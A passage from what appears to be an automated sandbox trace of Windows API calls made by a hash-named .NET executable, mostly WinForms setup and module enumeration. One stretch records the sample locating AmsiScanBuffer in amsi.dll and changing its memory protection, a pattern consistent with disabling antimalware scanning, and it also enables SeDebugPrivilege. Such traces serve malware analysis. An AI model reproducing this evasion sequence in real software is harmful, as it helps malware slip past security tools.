(lpWndClass=0x19eebc) returned 0xc1d4 [0153.654] CoTaskMemFree (pv=0x895668) [0153.654] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0153.655] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r10_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30340 [0153.656] SetWindowLongW (hWnd=0x30340, nIndex=-4, dwNewLong=1943799776) returned 77792702 [0153.660] GetWindowLongW (hWnd=0x30340, nIndex=-4) returned 1943799776 [0153.668] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e71c | out: phkResult=0x19e71c*=0x2b4) returned 0x0 [0153.670] RegQueryValueExW (in: hKey=0x2b4, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x19e73c, lpData=0x0, lpcbData=0x19e738*=0x0 | out: lpType=0x19e73c*=0x0, lpData=0x0, lpcbData=0x19e738*=0x0) returned 0x2 [0153.670] RegQueryValueExW (in: hKey=0x2b4, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x19e73c, lpData=0x0, lpcbData=0x19e738*=0x0 | out: lpType=0x19e73c*=0x0, lpData=0x0, lpcbData=0x19e738*=0x0) returned 0x2 [0153.670] RegCloseKey (hKey=0x2b4) returned 0x0 [0153.675] SetWindowLongW (hWnd=0x30340, nIndex=-4, dwNewLong=77792742) returned 1943799776 [0153.675] GetWindowLongW (hWnd=0x30340, nIndex=-4) returned 77792742 [0153.676] GetWindowLongW (hWnd=0x30340, nIndex=-16) returned 113311744 [0153.677] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc150 [0153.677] CallWindowProcW (lpPrevWndFunc=0x73dc07e0, hWnd=0x30340, Msg=0x24, wParam=0x0, lParam=0x19ea34) returned 0x0 [0153.678] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1d2 [0153.678] CallWindowProcW (lpPrevWndFunc=0x73dc07e0, hWnd=0x30340, Msg=0x81, wParam=0x0, lParam=0x19ea28) returned 0x1 [0153.680] CallWindowProcW (lpPrevWndFunc=0x73dc07e0, hWnd=0x30340, Msg=0x83, wParam=0x0, lParam=0x19ea14) returned 0x0 [0154.107] CallWindowProcW (lpPrevWndFunc=0x73dc07e0, hWnd=0x30340, Msg=0x1, wParam=0x0, lParam=0x19ea28) returned 0x0 [0154.108] GetClientRect (in: hWnd=0x30340, lpRect=0x19e754 | out: lpRect=0x19e754) returned 1 [0154.108] GetWindowRect (in: hWnd=0x30340, lpRect=0x19e754 | out: lpRect=0x19e754) returned 1 [0154.110] GetParent (hWnd=0x30340) returned 0x0 [0154.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x19ee74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0154.617] IsAppThemed () returned 0x1 [0154.619] CoTaskMemAlloc (cb=0xf0) returned 0x89afe0 [0154.621] CreateActCtxA (pActCtx=0x19f370) returned 0x88a254 [0154.749] CoTaskMemFree (pv=0x89afe0) [0155.155] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6c7b0000 [0155.157] AdjustWindowRectEx (in: lpRect=0x19efcc, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x19efcc) returned 1 [0155.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="amsi.dll", cchWideChar=8, lpMultiByteStr=0x19ec88, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="amsi.dllµId", lpUsedDefaultChar=0x0) returned 8 [0155.690] LoadLibraryExA (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x0) returned 0x6d300000 [0155.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AmsiScanBuffer", cchWideChar=14, lpMultiByteStr=0x19ec7c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AmsiScanBufferd", lpUsedDefaultChar=0x0) returned 14 [0155.829] GetProcAddress (hModule=0x6d300000, lpProcName="AmsiScanBuffer") returned 0x6d304020 [0156.061] VarDecRound (in: pdecIn=0x19ed14, cDecimals=0, pdecResult=0x19ece4 | out: pdecResult=0x19ece4) returned 0x0 [0156.231] VirtualProtect (in: lpAddress=0x6d304020, dwSize=0x9, flNewProtect=0x40, lpflOldProtect=0x19ed28 | out: lpflOldProtect=0x19ed28*=0x20) returned 1 [0156.232] VirtualProtect (in: lpAddress=0x6d304020, dwSize=0x9, flNewProtect=0x20, lpflOldProtect=0x19ed24 | out: lpflOldProtect=0x19ed24*=0x40) returned 1 [0157.954] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x19ecd0 | out: pfEnabled=0x19ecd0) returned 0x0 [0163.959] EtwEventRegister (in: ProviderId=0x22571e0, EnableCallback=0x4a30636, CallbackContext=0x0, RegHandle=0x22571bc | out: RegHandle=0x22571bc) returned 0x0 [0164.061] EtwEventSetInformation (RegHandle=0x878c60, InformationClass=0x2f, EventInformation=0x2, InformationLength=0x2257150) returned 0x0 [0164.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19e108) returned 1 [0164.147] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19e184 | out: lpFileInformation=0x19e184*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19e104) returned 1 [0165.270] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", nBufferLength=0x105, lpBuffer=0x19dddc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", lpFilePart=0x0) returned 0x62 [0165.411] GetACP () returned 0x4e4 [0166.285] GetCurrentProcessId () returned 0x1318 [0166.291] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19c494 | out: lpLuid=0x19c494*(LowPart=0x14, HighPart=0)) returned 1 [0166.296] GetCurrentProcess () returned 0xffffffff [0166.297] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x19c490 | out: TokenHandle=0x19c490*=0x2e4) returned 1 [0166.298] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x22ef448*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0166.298] CloseHandle (hObject=0x2e4) returned 1 [0166.306] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 0x2e4 [0166.404] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x22efcc4, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x22efcc4, lpcbNeeded=0x19cb68) returned 1 [0166.406] GetModuleInformation (in: hProcess=0x2e4, hModule=0x400000, lpmodinfo=0x22efe04, cb=0xc | out: lpmodinfo=0x22efe04*(lpBaseOfDll=0x400000, SizeOfImage=0x76000, EntryPoint=0x0)) returned 1 [0166.408] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.408] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x44 [0166.409] CoTaskMemFree (pv=0x8b4098) [0166.410] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.410] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0166.410] CoTaskMemFree (pv=0x8b4098) [0166.411] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77110000, lpmodinfo=0x22f2044, cb=0xc | out: lpmodinfo=0x22f2044*(lpBaseOfDll=0x77110000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0166.412] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.412] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77110000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0166.412] CoTaskMemFree (pv=0x8b4098) [0166.412] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.412] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77110000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0166.412] CoTaskMemFree (pv=0x8b4098) [0166.412] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d320000, lpmodinfo=0x22f4148, cb=0xc | out: lpmodinfo=0x22f4148*(lpBaseOfDll=0x6d320000, SizeOfImage=0x59000, EntryPoint=0x6d330780)) returned 1 [0166.413] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.413] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d320000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0166.413] CoTaskMemFree (pv=0x8b4098) [0166.413] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.413] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d320000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0166.414] CoTaskMemFree (pv=0x8b4098) [0166.414] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74610000, lpmodinfo=0x22f6254, cb=0xc | out: lpmodinfo=0x22f6254*(lpBaseOfDll=0x74610000, SizeOfImage=0xe0000, EntryPoint=0x74623980)) returned 1 [0166.414] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.414] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74610000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0166.414] CoTaskMemFree (pv=0x8b4098) [0166.415] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.415] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74610000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0166.415] CoTaskMemFree (pv=0x8b4098) [0166.415] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75710000, lpmodinfo=0x22f8368, cb=0xc | out: lpmodinfo=0x22f8368*(lpBaseOfDll=0x75710000, SizeOfImage=0x17e000, EntryPoint=0x757c1b90)) returned 1 [0166.416] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.416] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75710000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0166.416] CoTaskMemFree (pv=0x8b4098) [0166.416] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.416] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75710000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0166.417] CoTaskMemFree (pv=0x8b4098) [0166.417] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73d90000, lpmodinfo=0x22fa4b0, cb=0xc | out: lpmodinfo=0x22fa4b0*(lpBaseOfDll=0x73d90000, SizeOfImage=0x92000, EntryPoint=0x73dd0380)) returned 1 [0166.417] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.417] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73d90000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0166.417] CoTaskMemFree (pv=0x8b4098) [0166.417] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.417] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73d90000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0166.418] CoTaskMemFree (pv=0x8b4098) [0166.418] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74380000, lpmodinfo=0x22fc5bc, cb=0xc | out: lpmodinfo=0x22fc5bc*(lpBaseOfDll=0x74380000, SizeOfImage=0x7b000, EntryPoint=0x7439e970)) returned 1 [0166.418] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.418] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74380000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0166.419] CoTaskMemFree (pv=0x8b4098) [0166.419] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.419] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74380000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0166.420] CoTaskMemFree (pv=0x8b4098) [0166.420] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75a40000, lpmodinfo=0x22fe6d0, cb=0xc | out: lpmodinfo=0x22fe6d0*(lpBaseOfDll=0x75a40000, SizeOfImage=0xbe000, EntryPoint=0x75a75630)) returned 1 [0166.420] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.420] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75a40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0166.420] CoTaskMemFree (pv=0x8b4098) [0166.420] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.420] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75a40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0166.421] CoTaskMemFree (pv=0x8b4098) [0166.421] GetModuleInformation (in: hProcess=0x2e4, hModule=0x758c0000, lpmodinfo=0x23007dc, cb=0xc | out: lpmodinfo=0x23007dc*(lpBaseOfDll=0x758c0000, SizeOfImage=0x44000, EntryPoint=0x758d9d80)) returned 1 [0166.422] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.422] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x758c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0166.422] CoTaskMemFree (pv=0x8b4098) [0166.423] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.423] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x758c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0166.423] CoTaskMemFree (pv=0x8b4098) [0166.424] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75970000, lpmodinfo=0x2302934, cb=0xc | out: lpmodinfo=0x2302934*(lpBaseOfDll=0x75970000, SizeOfImage=0xad000, EntryPoint=0x75984f00)) returned 1 [0166.424] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.424] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75970000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0166.425] CoTaskMemFree (pv=0x8b4098) [0166.425] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.425] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75970000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0166.425] CoTaskMemFree (pv=0x8b4098) [0166.425] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e40000, lpmodinfo=0x2304a40, cb=0xc | out: lpmodinfo=0x2304a40*(lpBaseOfDll=0x73e40000, SizeOfImage=0x1e000, EntryPoint=0x73e4b640)) returned 1 [0166.426] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.426] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0166.426] CoTaskMemFree (pv=0x8b4098) [0166.426] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.426] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0166.427] CoTaskMemFree (pv=0x8b4098) [0166.427] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e30000, lpmodinfo=0x2306b4c, cb=0xc | out: lpmodinfo=0x2306b4c*(lpBaseOfDll=0x73e30000, SizeOfImage=0xa000, EntryPoint=0x73e32a00)) returned 1 [0166.427] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.427] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e30000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0166.428] CoTaskMemFree (pv=0x8b4098) [0166.428] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.428] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e30000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0166.428] CoTaskMemFree (pv=0x8b4098) [0166.428] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77040000, lpmodinfo=0x2308c60, cb=0xc | out: lpmodinfo=0x2308c60*(lpBaseOfDll=0x77040000, SizeOfImage=0x58000, EntryPoint=0x770825c0)) returned 1 [0166.429] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.429] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77040000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0166.429] CoTaskMemFree (pv=0x8b4098) [0166.429] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.429] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77040000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0166.430] CoTaskMemFree (pv=0x8b4098) [0166.430] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c8d0000, lpmodinfo=0x230ad94, cb=0xc | out: lpmodinfo=0x230ad94*(lpBaseOfDll=0x6c8d0000, SizeOfImage=0x79000, EntryPoint=0x6c8df82a)) returned 1 [0166.430] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.430] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0166.431] CoTaskMemFree (pv=0x8b4098) [0166.431] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.431] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0166.431] CoTaskMemFree (pv=0x8b4098) [0166.431] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a00000, lpmodinfo=0x230cedc, cb=0xc | out: lpmodinfo=0x230cedc*(lpBaseOfDll=0x74a00000, SizeOfImage=0x45000, EntryPoint=0x74a1de90)) returned 1 [0166.432] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.432] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0166.432] CoTaskMemFree (pv=0x8b4098) [0166.432] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.432] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0166.433] CoTaskMemFree (pv=0x8b4098) [0166.433] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74400000, lpmodinfo=0x230efe8, cb=0xc | out: lpmodinfo=0x230efe8*(lpBaseOfDll=0x74400000, SizeOfImage=0x1bd000, EntryPoint=0x744e2a10)) returned 1 [0166.434] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.434] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0166.434] CoTaskMemFree (pv=0x8b4098) [0166.434] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.434] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0166.435] CoTaskMemFree (pv=0x8b4098) [0166.435] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a50000, lpmodinfo=0x23110f4, cb=0xc | out: lpmodinfo=0x23110f4*(lpBaseOfDll=0x74a50000, SizeOfImage=0x14f000, EntryPoint=0x74b06820)) returned 1 [0166.436] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.436] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a50000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0166.437] CoTaskMemFree (pv=0x8b4098) [0166.438] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.438] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a50000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0166.438] CoTaskMemFree (pv=0x8b4098) [0166.438] GetModuleInformation (in: hProcess=0x2e4, hModule=0x755c0000, lpmodinfo=0x2313284, cb=0xc | out: lpmodinfo=0x2313284*(lpBaseOfDll=0x755c0000, SizeOfImage=0x147000, EntryPoint=0x755d1cf0)) returned 1 [0166.439] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.439] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x755c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0166.439] CoTaskMemFree (pv=0x8b4098) [0166.439] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.439] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x755c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0166.440] CoTaskMemFree (pv=0x8b4098) [0166.440] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74990000, lpmodinfo=0x2315390, cb=0xc | out: lpmodinfo=0x2315390*(lpBaseOfDll=0x74990000, SizeOfImage=0x2b000, EntryPoint=0x74995680)) returned 1 [0166.441] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.441] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74990000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0166.441] CoTaskMemFree (pv=0x8b4098) [0166.441] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.441] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74990000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0166.442] CoTaskMemFree (pv=0x8b4098) [0166.442] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77030000, lpmodinfo=0x2317494, cb=0xc | out: lpmodinfo=0x2317494*(lpBaseOfDll=0x77030000, SizeOfImage=0xc000, EntryPoint=0x77033930)) returned 1 [0166.443] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.443] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77030000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0166.444] CoTaskMemFree (pv=0x8b4098) [0166.444] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.444] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77030000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0166.444] CoTaskMemFree (pv=0x8b4098) [0166.444] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d310000, lpmodinfo=0x23195c0, cb=0xc | out: lpmodinfo=0x23195c0*(lpBaseOfDll=0x6d310000, SizeOfImage=0x8000, EntryPoint=0x6d3117b0)) returned 1 [0166.445] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.445] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d310000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0166.446] CoTaskMemFree (pv=0x8b4098) [0166.446] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.446] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d310000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0166.446] CoTaskMemFree (pv=0x8b4098) [0166.446] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6b6f0000, lpmodinfo=0x231b6cc, cb=0xc | out: lpmodinfo=0x231b6cc*(lpBaseOfDll=0x6b6f0000, SizeOfImage=0x6b1000, EntryPoint=0x6b705d20)) returned 1 [0166.447] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.447] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0166.448] CoTaskMemFree (pv=0x8b4098) [0166.448] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.448] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0166.448] CoTaskMemFree (pv=0x8b4098) [0166.448] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c650000, lpmodinfo=0x231d7fc, cb=0xc | out: lpmodinfo=0x231d7fc*(lpBaseOfDll=0x6c650000, SizeOfImage=0xf5000, 